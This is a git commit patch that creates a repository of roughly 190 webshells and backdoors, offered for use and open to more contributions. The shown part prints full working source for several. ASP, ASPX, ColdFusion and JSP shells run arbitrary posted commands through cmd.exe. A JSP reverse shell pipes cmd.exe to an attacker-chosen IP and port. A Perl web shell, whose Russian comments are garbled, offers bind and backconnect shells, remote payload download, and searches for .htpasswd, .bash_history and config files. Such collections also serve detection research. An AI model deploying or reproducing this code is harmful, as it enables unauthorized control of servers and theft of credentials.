From c6a790baf653b877e2d452c108077af73a0e013f Mon Sep 17 00:00:00 2001 From: Evan Teitelman Date: Mon, 12 Jan 2015 17:32:48 -0500 Subject: [PATCH] Initial commit --- README.md | 1 + asp/cmd-asp-5.1.asp | 41 + asp/cmdasp.asp | 55 + aspx/cmdasp.aspx | 42 + cfm/cfexec.cfm | 43 + jsp/cmdjsp.jsp | 32 + jsp/jsp-reverse.jsp | 91 + perl/Perl Web Shell by RST-GHC.pl | 663 ++ perl/dc.pl | 57 + perl/perl-reverse-shell.pl | 124 + perl/perlcmd.cgi | 34 + php/529.php | 58 + ...4 Security Team Web Shell Beta Version.php | 640 ++ php/Ajax_PHP Command Shell.php | 646 ++ php/Ajax_PHP_Command_Shell.php | 646 ++ php/Antichat Shell v1.3.php | 180 + php/Antichat Shell. Modified by Go0o$E.php | 693 ++ php/Antichat Shell.php | 366 ++ php/Antichat_Shell_v1.3.php | 180 + php/Ayyildiz Tim -AYT- Shell v 2.1 Biz.php | 317 + php/C99Shell v. 1.0 beta (5.02.2005).php | 2900 +++++++++ ...ll v. 1.0 pre-release build(safe-mode).php | 3157 ++++++++++ php/C99madShell v. 2.0 madnet edition.php | 7 + php/CTT Shell.php | 2927 +++++++++ php/CasuS 1.5.php | 368 ++ php/CmdAsp.asp.php.txt | 55 + php/Crystal shell.php | 1065 ++++ php/Crystal.php | 1127 ++++ php/CrystalShell v.1.php | 929 +++ php/Cyber Shell (v 1.0).php | 1033 +++ php/Cyber Shell.php | 1033 +++ php/CyberSpy5.Asp.php.txt | 2 + php/DTool Pro.php | 198 + php/Dive Shell 1.0 - Emperor Hacking Team.php | 187 + php/Dive_Shell_1.0_Emperor_Hacking_Team.php | 187 + php/Dx.php | 2026 ++++++ php/DxShell v1.0.php | 2031 ++++++ php/DxShell.1.0.php | 2111 +++++++ php/EFSO_2.php.txt | 57 + php/Elmaliseker.php.txt | 2324 +++++++ php/FaTaLisTiCz_Fx.php | 3107 +++++++++ php/GFS Web-Shell.php | 1575 +++++ php/GFS web-shell ver 3.1.7 - PRiV8.php | 618 ++ php/GFS_web-shell_ver_3.1.7_-_PRiV8.php | 520 ++ ...l 2.0 release build 2018 (C)2006,Great.php | 575 ++ php/Gamma Web Shell.php | 869 +++ php/JspWebshell 1.2.php | 788 +++ php/JspWebshell_1.2.php | 789 +++ php/KA_uShell 0.1.6.php | 229 + php/KAdot Universal Shell v0.1.6.php | 229 + php/KAdot_Universal_Shell_v0.1.6.php | 230 + ...Mode Command Execuriton Bypass Exploit.php | 34 + php/Loaderz WEB Shell.php | 513 ++ php/Macker's Private PHPShell.php | 2026 ++++++ php/Moroccan Spamers Ma-EditioN By GhOsT.php | 182 + php/Moroccan_Spamers_Ma-EditioN_By_GhOsT.php | 182 + php/MySQL Web Interface Version 0.8.php | 1302 ++++ php/MySQL_Web_Interface_Version_0.8.php | 1302 ++++ php/MyShell.php | 304 + php/Mysql interface v1.0.php | 1166 ++++ php/Mysql_interface_v1.0.php | 1166 ++++ php/NCC-Shell.php | 60 + php/NFM 1.8.php | 3086 +++++++++ php/NGH.php | 462 ++ php/NIX REMOTE WEB SHELL.php | 1772 ++++++ ...-SHELL v.0.5 alpha Lite Public Version.php | 1480 +++++ ...-SHELL_v.0.5_alpha_Lite_Public_Version.php | 1480 +++++ php/NTDaddy v1.9.php | 1012 +++ php/NetworkFileManagerPHP.php | 5603 +++++++++++++++++ php/PH Vayv.php | 597 ++ php/PHANTASMA.php | 634 ++ php/PHP Shell.php | 1010 +++ php/PHPJackal.php | 1582 +++++ php/PHPRemoteView.php | 1073 ++++ php/PHVayv.php | 597 ++ php/PH_Vayv.php | 597 ++ php/PhpSpy Ver 2006.php | 1309 ++++ php/Predator.php | 1367 ++++ php/Private-i3lue.php | 1456 +++++ php/RemExp.asp.php.txt | 250 + php/Rootshell.v.1.0.php | 246 + php/STNC WebShell v0.8.php | 168 + ...er Shell -Safe Mod Bypass By Evilc0der.php | 950 +++ ...fe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php | 89 + ...fe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php | 90 + ...ker - Vrsion 1.0.0 - priv8 4 My friend.php | 378 ++ php/SimShell 1.0 - Simorgh Security MGZ.php | 180 + php/SimShell_1.0_-_Simorgh_Security_MGZ.php | 180 + php/Simple_PHP_backdoor_by_DK.php | 19 + php/Sincap 1.0.php | 124 + php/Small Web Shell by ZaCo.php | 501 ++ php/SnIpEr_SA Shell.php | 2246 +++++++ php/SnIpEr_SA_Shell.php | 1711 +++++ php/Uploader.php | 9 + php/Web-shell (c)ShAnKaR.php | 644 ++ php/WinX Shell.php | 103 + php/Worse Linux Shell.php | 69 + php/ZyklonShell.php | 7 + php/aZRaiLPhp v1.0.php | 284 + php/aZRaiLPhp_v1.0.php | 284 + php/accept_language.php | 1 + php/angel.php | 1962 ++++++ php/aspydrv.php | 828 +++ php/b374k-2.7.php | 10 + php/b374k-mini-shell-php.php.php | 195 + php/b374k.php.php | 266 + php/backupsql.php | 170 + php/beyaz_hacker.php | 2605 ++++++++ php/c0derz shell [csh] v. 0.1.1 release.php | 334 + php/c100.php | 3145 +++++++++ php/c99.php | 3069 +++++++++ php/c99_PSych0.php | 3284 ++++++++++ php/c99_locus7s.php | 3595 +++++++++++ php/c99_madnet.php | 7 + php/c99_w4cking.php | 2831 +++++++++ php/c99unlimited.php | 3577 +++++++++++ php/cgitelnet.php | 692 ++ php/cpanel.php | 178 + php/ctt_sh.php | 2927 +++++++++ php/cw.php | 766 +++ php/cybershell.php | 1033 +++ php/dC3 Security Crew Shell PRiV.php | 1273 ++++ php/dC3_Security_Crew_Shell_PRiV.php | 1274 ++++ php/erne.php | 1453 +++++ php/ex0shell.php | 601 ++ php/fatal.php | 288 + php/findsock.c | 137 + php/ftpsearch.php | 102 + php/g00nshell-v1.3.php | 730 +++ php/g3.php | 1592 +++++ php/gfs_sh.php | 1575 +++++ php/go-shell.php | 87 + php/h4ntu shell [powered by tsoi].php | 78 + php/h4ntu_shell_[powered_by_tsoi].php | 78 + php/hiddens shell v1.php | 1 + php/hxpshell.php | 2061 ++++++ php/iMHaBiRLiGi Php FTP.php | 2061 ++++++ php/iMHaPFtp.php | 2061 ++++++ php/indexer.asp.php.txt | 74 + php/ironshell.php | 588 ++ php/klasvayv.asp.php.txt | 901 +++ php/kral.php | 371 ++ php/lamashell.php | 89 + php/load_shell.php | 513 ++ php/lolipop.php | 288 + php/lostDC.php | 475 ++ php/magiccoder.php | 2164 +++++++ php/matamu.php | 146 + php/megabor.php | 660 ++ php/myshell.php | 420 ++ php/mysql.php | 1231 ++++ php/mysql_tool.php | 1078 ++++ php/nsTView v2.1.php | 2136 +++++++ php/nshell.php | 371 ++ php/nst.php | 2137 +++++++ php/nstview.php | 2136 +++++++ php/pHpINJ.php | 37 + php/php-backdoor.php | 71 + php/php-findsock-shell.php | 89 + php/php-include-w-shell.php | 1312 ++++ php/php-reverse-shell.php | 192 + php/phpRemoteView.php | 2553 ++++++++ php/pws.php | 35 + php/qsd-php-backdoor.php | 429 ++ php/r57.php | 2295 +++++++ php/r57_Mohajer22.php | 2369 +++++++ php/r57_iFX.php | 1917 ++++++ php/r57_kartal.php | 1883 ++++++ php/r57shell.php | 2206 +++++++ php/r57shell1.40.php | 3301 ++++++++++ php/r57shell2.0.php | 2129 +++++++ php/reader.asp.php.txt | 116 + php/robots.php | 4 + php/rootshell.php | 349 + php/ru24_post_sh.php | 23 + php/s72 Shell v1.1 Coding.php | 141 + php/s72_Shell_v1.1_Coding.php | 141 + php/sa.php | 3865 ++++++++++++ php/safe0ver.php | 934 +++ php/shellzx.php | 1460 +++++ php/simattacker.php | 754 +++ php/simple-backdoor.php | 17 + php/simple_cmd.php | 18 + php/small.php | 502 ++ php/soldierofallah.php | 1303 ++++ php/sosyete.php | 221 + php/spygrup.php | 182 + php/stres.php | 926 +++ php/toolaspshell.php | 792 +++ php/tryag.php | 1521 +++++ php/zaco.php | 502 ++ php/zacosmall.php | 501 ++ php/zehir4.asp.php.txt | 1190 ++++ php/zehir4.php | 1194 ++++ 194 files changed, 180227 insertions(+) create mode 100644 README.md create mode 100644 asp/cmd-asp-5.1.asp create mode 100644 asp/cmdasp.asp create mode 100644 aspx/cmdasp.aspx create mode 100644 cfm/cfexec.cfm create mode 100644 jsp/cmdjsp.jsp create mode 100644 jsp/jsp-reverse.jsp create mode 100644 perl/Perl Web Shell by RST-GHC.pl create mode 100644 perl/dc.pl create mode 100755 perl/perl-reverse-shell.pl create mode 100644 perl/perlcmd.cgi create mode 100644 php/529.php create mode 100644 php/AK-74 Security Team Web Shell Beta Version.php create mode 100644 php/Ajax_PHP Command Shell.php create mode 100644 php/Ajax_PHP_Command_Shell.php create mode 100644 php/Antichat Shell v1.3.php create mode 100644 php/Antichat Shell. Modified by Go0o$E.php create mode 100644 php/Antichat Shell.php create mode 100644 php/Antichat_Shell_v1.3.php create mode 100644 php/Ayyildiz Tim -AYT- Shell v 2.1 Biz.php create mode 100644 php/C99Shell v. 1.0 beta (5.02.2005).php create mode 100644 php/C99Shell v. 1.0 pre-release build(safe-mode).php create mode 100644 php/C99madShell v. 2.0 madnet edition.php create mode 100644 php/CTT Shell.php create mode 100644 php/CasuS 1.5.php create mode 100644 php/CmdAsp.asp.php.txt create mode 100644 php/Crystal shell.php create mode 100644 php/Crystal.php create mode 100644 php/CrystalShell v.1.php create mode 100644 php/Cyber Shell (v 1.0).php create mode 100644 php/Cyber Shell.php create mode 100644 php/CyberSpy5.Asp.php.txt create mode 100644 php/DTool Pro.php create mode 100644 php/Dive Shell 1.0 - Emperor Hacking Team.php create mode 100644 php/Dive_Shell_1.0_Emperor_Hacking_Team.php create mode 100644 php/Dx.php create mode 100644 php/DxShell v1.0.php create mode 100644 php/DxShell.1.0.php create mode 100644 php/EFSO_2.php.txt create mode 100644 php/Elmaliseker.php.txt create mode 100644 php/FaTaLisTiCz_Fx.php create mode 100644 php/GFS Web-Shell.php create mode 100644 php/GFS web-shell ver 3.1.7 - PRiV8.php create mode 100644 php/GFS_web-shell_ver_3.1.7_-_PRiV8.php create mode 100644 php/GRP WebShell 2.0 release build 2018 (C)2006,Great.php create mode 100644 php/Gamma Web Shell.php create mode 100644 php/JspWebshell 1.2.php create mode 100644 php/JspWebshell_1.2.php create mode 100644 php/KA_uShell 0.1.6.php create mode 100644 php/KAdot Universal Shell v0.1.6.php create mode 100644 php/KAdot_Universal_Shell_v0.1.6.php create mode 100644 php/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php create mode 100644 php/Loaderz WEB Shell.php create mode 100644 php/Macker's Private PHPShell.php create mode 100644 php/Moroccan Spamers Ma-EditioN By GhOsT.php create mode 100644 php/Moroccan_Spamers_Ma-EditioN_By_GhOsT.php create mode 100644 php/MySQL Web Interface Version 0.8.php create mode 100644 php/MySQL_Web_Interface_Version_0.8.php create mode 100644 php/MyShell.php create mode 100644 php/Mysql interface v1.0.php create mode 100644 php/Mysql_interface_v1.0.php create mode 100644 php/NCC-Shell.php create mode 100644 php/NFM 1.8.php create mode 100644 php/NGH.php create mode 100644 php/NIX REMOTE WEB SHELL.php create mode 100644 php/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php create mode 100644 php/NIX_REMOTE_WEB-SHELL_v.0.5_alpha_Lite_Public_Version.php create mode 100644 php/NTDaddy v1.9.php create mode 100644 php/NetworkFileManagerPHP.php create mode 100644 php/PH Vayv.php create mode 100644 php/PHANTASMA.php create mode 100644 php/PHP Shell.php create mode 100644 php/PHPJackal.php create mode 100644 php/PHPRemoteView.php create mode 100644 php/PHVayv.php create mode 100644 php/PH_Vayv.php create mode 100644 php/PhpSpy Ver 2006.php create mode 100644 php/Predator.php create mode 100644 php/Private-i3lue.php create mode 100644 php/RemExp.asp.php.txt create mode 100644 php/Rootshell.v.1.0.php create mode 100644 php/STNC WebShell v0.8.php create mode 100644 php/Safe0ver Shell -Safe Mod Bypass By Evilc0der.php create mode 100644 php/Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php create mode 100644 php/Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php create mode 100644 php/SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php create mode 100644 php/SimShell 1.0 - Simorgh Security MGZ.php create mode 100644 php/SimShell_1.0_-_Simorgh_Security_MGZ.php create mode 100644 php/Simple_PHP_backdoor_by_DK.php create mode 100644 php/Sincap 1.0.php create mode 100644 php/Small Web Shell by ZaCo.php create mode 100644 php/SnIpEr_SA Shell.php create mode 100644 php/SnIpEr_SA_Shell.php create mode 100644 php/Uploader.php create mode 100644 php/Web-shell (c)ShAnKaR.php create mode 100644 php/WinX Shell.php create mode 100644 php/Worse Linux Shell.php create mode 100644 php/ZyklonShell.php create mode 100644 php/aZRaiLPhp v1.0.php create mode 100644 php/aZRaiLPhp_v1.0.php create mode 100644 php/accept_language.php create mode 100644 php/angel.php create mode 100644 php/aspydrv.php create mode 100644 php/b374k-2.7.php create mode 100644 php/b374k-mini-shell-php.php.php create mode 100644 php/b374k.php.php create mode 100644 php/backupsql.php create mode 100644 php/beyaz_hacker.php create mode 100644 php/c0derz shell [csh] v. 0.1.1 release.php create mode 100644 php/c100.php create mode 100644 php/c99.php create mode 100644 php/c99_PSych0.php create mode 100644 php/c99_locus7s.php create mode 100644 php/c99_madnet.php create mode 100644 php/c99_w4cking.php create mode 100644 php/c99unlimited.php create mode 100644 php/cgitelnet.php create mode 100644 php/cpanel.php create mode 100644 php/ctt_sh.php create mode 100644 php/cw.php create mode 100644 php/cybershell.php create mode 100644 php/dC3 Security Crew Shell PRiV.php create mode 100644 php/dC3_Security_Crew_Shell_PRiV.php create mode 100644 php/erne.php create mode 100644 php/ex0shell.php create mode 100644 php/fatal.php create mode 100644 php/findsock.c create mode 100644 php/ftpsearch.php create mode 100644 php/g00nshell-v1.3.php create mode 100644 php/g3.php create mode 100644 php/gfs_sh.php create mode 100644 php/go-shell.php create mode 100644 php/h4ntu shell [powered by tsoi].php create mode 100644 php/h4ntu_shell_[powered_by_tsoi].php create mode 100644 php/hiddens shell v1.php create mode 100644 php/hxpshell.php create mode 100644 php/iMHaBiRLiGi Php FTP.php create mode 100644 php/iMHaPFtp.php create mode 100644 php/indexer.asp.php.txt create mode 100644 php/ironshell.php create mode 100644 php/klasvayv.asp.php.txt create mode 100644 php/kral.php create mode 100644 php/lamashell.php create mode 100644 php/load_shell.php create mode 100644 php/lolipop.php create mode 100644 php/lostDC.php create mode 100644 php/magiccoder.php create mode 100644 php/matamu.php create mode 100644 php/megabor.php create mode 100644 php/myshell.php create mode 100644 php/mysql.php create mode 100644 php/mysql_tool.php create mode 100644 php/nsTView v2.1.php create mode 100644 php/nshell.php create mode 100644 php/nst.php create mode 100644 php/nstview.php create mode 100644 php/pHpINJ.php create mode 100644 php/php-backdoor.php create mode 100755 php/php-findsock-shell.php create mode 100644 php/php-include-w-shell.php create mode 100755 php/php-reverse-shell.php create mode 100644 php/phpRemoteView.php create mode 100644 php/pws.php create mode 100644 php/qsd-php-backdoor.php create mode 100644 php/r57.php create mode 100644 php/r57_Mohajer22.php create mode 100644 php/r57_iFX.php create mode 100644 php/r57_kartal.php create mode 100644 php/r57shell.php create mode 100644 php/r57shell1.40.php create mode 100644 php/r57shell2.0.php create mode 100644 php/reader.asp.php.txt create mode 100644 php/robots.php create mode 100644 php/rootshell.php create mode 100644 php/ru24_post_sh.php create mode 100644 php/s72 Shell v1.1 Coding.php create mode 100644 php/s72_Shell_v1.1_Coding.php create mode 100644 php/sa.php create mode 100644 php/safe0ver.php create mode 100644 php/shellzx.php create mode 100644 php/simattacker.php create mode 100644 php/simple-backdoor.php create mode 100644 php/simple_cmd.php create mode 100644 php/small.php create mode 100644 php/soldierofallah.php create mode 100644 php/sosyete.php create mode 100644 php/spygrup.php create mode 100644 php/stres.php create mode 100644 php/toolaspshell.php create mode 100644 php/tryag.php create mode 100644 php/zaco.php create mode 100644 php/zacosmall.php create mode 100644 php/zehir4.asp.php.txt create mode 100644 php/zehir4.php diff --git a/README.md b/README.md new file mode 100644 index 0000000..b0ef08d --- /dev/null +++ b/README.md @@ -0,0 +1 @@ +Various webshells. Please send add more via pull requests. :) diff --git a/asp/cmd-asp-5.1.asp b/asp/cmd-asp-5.1.asp new file mode 100644 index 0000000..c4b93db --- /dev/null +++ b/asp/cmd-asp-5.1.asp @@ -0,0 +1,41 @@ +<% + +' ASP Cmd Shell On IIS 5.1 +' brett.moore_at_security-assessment.com +' http://seclists.org/bugtraq/2006/Dec/0226.html + + +Dim oS,oSNet,oFSys, oF,szCMD, szTF +On Error Resume Next +Set oS = Server.CreateObject("WSCRIPT.SHELL") +Set oSNet = Server.CreateObject("WSCRIPT.NETWORK") +Set oFSys = Server.CreateObject("Scripting.FileSystemObject") +szCMD = Request.Form("C") +If (szCMD <> "") Then + szTF = "c:\windows\pchealth\ERRORREP\QHEADLES\" & oFSys.GetTempName() + ' Here we do the command + Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF & +"""",0,True) + response.write szTF + ' Change perms + Call oS.Run("win.com cmd.exe /c cacls.exe " & szTF & " /E /G +everyone:F",0,True) + Set oF = oFSys.OpenTextFile(szTF,1,False,0) +End If +%> +
" method="POST"> + +
+Machine: <%=oSNet.ComputerName%>

+Username: <%=oSNet.UserName%>

+<% 
+If (IsObject(oF)) Then
+  On Error Resume Next
+  Response.Write Server.HTMLEncode(oF.ReadAll)
+  oF.Close
+  Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)
+End If 
+
+%>
+
+
diff --git a/asp/cmdasp.asp b/asp/cmdasp.asp
new file mode 100644
index 0000000..31ba9a5
--- /dev/null
+++ b/asp/cmdasp.asp
@@ -0,0 +1,55 @@
+<%@ Language=VBScript %>
+<%
+  ' --------------------o0o--------------------
+  '  File:    CmdAsp.asp
+  '  Author:  Maceo 
+  '  Release: 2000-12-01
+  '  OS:      Windows 2000, 4.0 NT
+  ' -------------------------------------------
+
+  Dim oScript
+  Dim oScriptNet
+  Dim oFileSys, oFile
+  Dim szCMD, szTempFile
+
+  On Error Resume Next
+
+  ' -- create the COM objects that we will be using -- '
+  Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+  Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+  Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+
+  ' -- check for a command that we have posted -- '
+  szCMD = Request.Form(".CMD")
+  If (szCMD <> "") Then
+
+    ' -- Use a poor man's pipe ... a temp file -- '
+    szTempFile = "C:\" & oFileSys.GetTempName( )
+    Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
+    Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
+
+  End If
+
+%>
+
+
+
" method="POST">
+
+
+

+
+<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
+

+<%
+  If (IsObject(oFile)) Then
+    ' -- Read the output from our command and remove the temp file -- '
+    On Error Resume Next
+    Response.Write Server.HTMLEncode(oFile.ReadAll)
+    oFile.Close
+    Call oFileSys.DeleteFile(szTempFile, True)
+  End If
+%>
+
+
+
+
diff --git a/aspx/cmdasp.aspx b/aspx/cmdasp.aspx
new file mode 100644
index 0000000..b420c87
--- /dev/null
+++ b/aspx/cmdasp.aspx
@@ -0,0 +1,42 @@
+<%@ Page Language="C#" Debug="true" Trace="false" %>
+<%@ Import Namespace="System.Diagnostics" %>
+<%@ Import Namespace="System.IO" %>
+
+
+
+awen asp.net webshell
+
+
+

+
+
+Command:
+

+
+
+
+
+
diff --git a/cfm/cfexec.cfm b/cfm/cfexec.cfm
new file mode 100644
index 0000000..80fb3db
--- /dev/null
+++ b/cfm/cfexec.cfm
@@ -0,0 +1,43 @@
+
+
+
+
+
+Notes:


+
    
+
  • Prefix DOS commands with "c:\windows\system32\cmd.exe /c <command>" or wherever cmd.exe is
    
+
  • Options are, of course, the command line options you want to run
+
  • CFEXECUTE could be removed by the admin. If you have access to CFIDE/administrator you can re-enable it
+

+

+
+
+
+
+
+
+
Command:value="#form.cmd#">
Options: value="#form.opts#">
Timeout: value="#form.timeout#"
+  value="5">

+
+
+
+
+
+
+
+
+
+#myVar#
+

+
+
+
+
+
+
+
diff --git a/jsp/cmdjsp.jsp b/jsp/cmdjsp.jsp
new file mode 100644
index 0000000..63625af
--- /dev/null
+++ b/jsp/cmdjsp.jsp
@@ -0,0 +1,32 @@
+// note that linux = cmd and windows = "cmd.exe /c + cmd" 
+
+

+
+
+

+
+<%@ page import="java.io.*" %>
+<%
+   String cmd = request.getParameter("cmd");
+   String output = "";
+
+   if(cmd != null) {
+      String s = null;
+      try {
+         Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
+         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
+         while((s = sI.readLine()) != null) {
+            output += s;
+         }
+      }
+      catch(IOException e) {
+         e.printStackTrace();
+      }
+   }
+%>
+
+
+<%=output %>
+

+
+
diff --git a/jsp/jsp-reverse.jsp b/jsp/jsp-reverse.jsp
new file mode 100644
index 0000000..ae9a781
--- /dev/null
+++ b/jsp/jsp-reverse.jsp
@@ -0,0 +1,91 @@
+// backdoor.jsp
+// http://www.security.org.sg/code/jspreverse.html
+
+<%@
+page import="java.lang.*, java.util.*, java.io.*, java.net.*"
+% >
+<%!
+static class StreamConnector extends Thread
+{
+        InputStream is;
+        OutputStream os;
+
+        StreamConnector(InputStream is, OutputStream os)
+        {
+                this.is = is;
+                this.os = os;
+        }
+
+        public void run()
+        {
+                BufferedReader isr = null;
+                BufferedWriter osw = null;
+
+                try
+                {
+                        isr = new BufferedReader(new InputStreamReader(is));
+                        osw = new BufferedWriter(new OutputStreamWriter(os));
+
+                        char buffer[] = new char[8192];
+                        int lenRead;
+
+                        while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
+                        {
+                                osw.write(buffer, 0, lenRead);
+                                osw.flush();
+                        }
+                }
+                catch (Exception ioe)
+
+                try
+                {
+                        if(isr != null) isr.close();
+                        if(osw != null) osw.close();
+                }
+                catch (Exception ioe)
+        }
+}
+%>
+
+
JSP Backdoor Reverse Shell

+
+

+IP Address
+
+Port
+
+
+

+

+

+
+<%
+String ipAddress = request.getParameter("ipaddress");
+String ipPort = request.getParameter("port");
+
+if(ipAddress != null && ipPort != null)
+{
+        Socket sock = null;
+        try
+        {
+                sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
+
+                Runtime rt = Runtime.getRuntime();
+                Process proc = rt.exec("cmd.exe");
+
+                StreamConnector outputConnector =
+                        new StreamConnector(proc.getInputStream(),
+                                          sock.getOutputStream());
+
+                StreamConnector inputConnector =
+                        new StreamConnector(sock.getInputStream(),
+                                          proc.getOutputStream());
+
+                outputConnector.start();
+                inputConnector.start();
+        }
+        catch(Exception e) 
+}
+%>
+
+
diff --git a/perl/Perl Web Shell by RST-GHC.pl b/perl/Perl Web Shell by RST-GHC.pl
new file mode 100644
index 0000000..e6f7c41
--- /dev/null
+++ b/perl/Perl Web Shell by RST-GHC.pl	
@@ -0,0 +1,663 @@
+#!/usr/bin/perl
+
+## pws.pl - Perl Web Shell by RST/GHC
+## -------------------------------------
+## ??????? ???????:
+## ~~~~~~~~~~~~~~~~
+## - ?????????? ???????????? ?????? ?? ??????? (+ ?????? ??????)
+## - ???????? ?????? ?? ?????? ? ?????????? ?????????? ????????????
+## - ???????? ?????? ?? ?????? ? ?????????? ???????
+## - ?????????? ???????????? ?????? ? ???????
+## - ???????? ? ?????????????? ?????? ?? ???????
+## - port bind
+## - backconnect
+##
+## ??????????? ???????:
+## ~~~~~~~~~~~~~~~~~~~~
+## - ???????? ??? ?? unix ??? ? ?? windows ??????????
+## - ??? ?????? ???????? ????? POST ???????
+##
+## ?????????:
+## ~~~~~~~~~~
+## 1. ???????? ?????? ????? ??????? "/usr/bin/perl" ?? ?????????? ???? ? ?????????????? ????? 
+##    ?? ????? ???????.
+## 2. ?????????? ?????? ??? ??????? ? ??????? ? ?????? ???????? (?????? CONFIG).
+## 3. ? ?????? ???? ?????? ???????? ??? ??????????? WINDOWS ?? ?????????? $unix = 0 ? ??????
+##    ???????? ??????? (?????? CONFIG).
+## 4. ????????? ???? ?? ?????? ? ????? ??????????? ?????? cgi-????????, ?????? cgi-bin.
+##    ???????? ?????? ???????????? ? ASCII ??????.
+## 5. ??????? ????? ?? ?????? (chmod 755).
+## 6. ???????? ?????? ? ???????? ? ?????????????.
+## -------------------------------------
+## (c)oded by 1dt.w0lf
+## RST/GHC
+## Astalavista-UnderGround!!!
+## 
+use IO::Socket;
+
+############### CONFIG
+$auth = 1;         # ??????????? (1 - ????????, 0 - ?????????)
+$password = 'r57'; # ?????? ??? ??????? ? ???????
+$unix = 1;         # ??? WINDOWS ??????? ?? $unix = 0
+# ?????? ?????? ?? ??????? ? ???????, ???? ?? ??????? ? ???, ??? ???????.
+$version = '1.0 (13.05.2005)';
+$pwd = ($unix)?('pwd'):('cd');          
+$cmd_sep = '&&';                        
+$def_cmd = ($unix)?('ls -la'):('dir');
+$path_sep = ($unix)?('/'):('\\');  
+$error = 0;
+############### TEXT
+@lang = (
+'?????????? ?????? ?? ???????
',
+'???????:',
+'??????????:',
+'?????? ??????
',
+'?????:',
+'?????????',
+'??????????? ???????:',
+'  ???????  ',
+'???????? ????? ? ?????????? ??????????
',
+'????:',
+'?????????',
+'???????? ????? c ?????????? ???????
',
+'????????/?????????????? ?????
',
+'????????',
+'?????????????? ?????:',
+'???????? ?????:',
+'?????????',
+'?????????? ?????
',
+' ??????? ',
+'Bind port
',
+'Port:',
+'BIND',
+'Backconnect
',
+'IP:',
+'CONNECT',
+'??????? ??????
',
+'?????'
+);
+############### HTML
+$d1 = '
';
+$d2 = '
';
+$t1 = '';
+$t2 = '
';
+$td1 = '';
+$f = '';
+$tr1 = '';
+$tr2 = '';
+$j1  = q{[ 2005 (c) RST/GHC http://rst.void.ru , http://ghc.ru ]};
+$j2  = q{
+
+
+
+
+};
+############### ALIASES
+%alias = (
+'find suid files' => 'find / -type f -perm -04000 -ls',
+'find suid files in current dir' => 'find . -type f -perm -04000 -ls',
+'find sgid files' => 'find / -type f -perm -02000 -ls',
+'find sgid files in current dir' => 'find . -type f -perm -02000 -ls',
+'find config.inc.php files' => 'find / -type f -name config.inc.php',
+'find config.inc.php files in current dir' => 'find . -type f -name config.inc.php',
+'find config* files' => 'find / -type f -name "config*"',
+'find config* files in current dir' => 'find . -type f -name "config*"',
+'find all writable files' => 'find / -type f -perm -2 -ls',
+'find all writable files in current dir' => 'find . -type f -perm -2 -ls',
+'find all writable directories' => 'find /  -type d -perm -2 -ls',
+'find all writable directories in current dir' => 'find . -type d -perm -2 -ls',
+'find all writable directories and files' => 'find / -perm -2 -ls',
+'find all writable directories and files in current dir' => 'find . -perm -2 -ls',
+'find all service.pwd files' => 'find / -type f -name service.pwd',
+'find service.pwd files in current dir' => 'find . -type f -name service.pwd',
+'find all .htpasswd files' => 'find / -type f -name .htpasswd',
+'find .htpasswd files in current dir' => 'find . -type f -name .htpasswd',
+'find all .bash_history files' => 'find / -type f -name .bash_history',
+'find .bash_history files in current dir' => 'find . -type f -name .bash_history',
+'find all .fetchmailrc files' => 'find / -type f -name .fetchmailrc',
+'find .fetchmailrc files in current dir' => 'find . -type f -name .fetchmailrc',
+'list file attributes' => 'lsattr -va',
+'show opened ports' => 'netstat -an | grep -i listen'
+);
+############### GET INFO
+($script_name = $ENV{'SCRIPT_NAME'}) =~ s!(?:.*)(?:/)([^/]*)!$1!;
+($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)?(&get_file($1)):(&get_val());
+############### AUTH
+if($auth)
+ {
+ &cook();
+ if($FORM{PASS} eq $password) { print "Set-Cookie: PASS=".cry($FORM{PASS}).";\nContent-type: text/html\n\n"; exit(); }
+ if(!$COOK{PASS}||($COOK{PASS} ne cry($password))) { &form_login; exit(); } 
+ }
+############### ACTIONS 
+$cur_dir = `$pwd`;
+if(defined$FORM{DIR}) { $cur_dir = $FORM{DIR}; }
+chomp($cur_dir);
+
+if(!defined$FORM{ACTION}) { $FORM{ACTION} = 'CMD'; }
+ 
+if($FORM{ACTION} eq 'ALIAS'){ $FORM{CMD} = $alias{$FORM{ALIAS}}; }
+
+elsif($FORM{ACTION} eq 'UPLOAD')
+ { 
+  $filename = $cur_dir;
+  chop($filename) if ($filename =~ m/[\\\/]$/);
+  $FILE{f} =~ s!(?:.*)(?:[\\/])([^/\\]*)$!$1!;
+  $filename .= $path_sep;
+  $filename .= $FILE{f};
+  if(open(UF, ">$filename"))
+   {
+    binmode(UF) if !$unix;
+    print UF $FILE{filedata};
+    close(UF);
+   }
+  else { $error = "??????! ?? ???? ??????? ???? $filename"; }
+  }
+
+elsif($FORM{ACTION} eq 'RUPLOAD')
+ {
+ if($FORM{FILE} =~ m!^(?:http:\/\/)([^\/]*)(\/.*)$!)
+  {
+  $server = $1;
+  $path   = $2;
+  $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
+  if($sock)
+   {
+   print $sock "GET $path HTTP/1.0\nHost: $server\n\n";
+   $r = 0; $a = 0;
+   foreach $l(<$sock>)
+    {
+    if($l =~ /200 OK/) { $a = 200; }
+    push(@rf,$l) if $r;
+    if($l =~ /^\s$/ && $a == 200) { $r = 1; }
+    }
+   if($a != 200) { $error = "??????! ???? $path ?? ?????? ?? ??????? $server"; }
+   }
+  else { $error = "??????! ?? ???? ??????????? ? $server"; }
+  if(!$error)
+   {
+   $filename = $cur_dir;
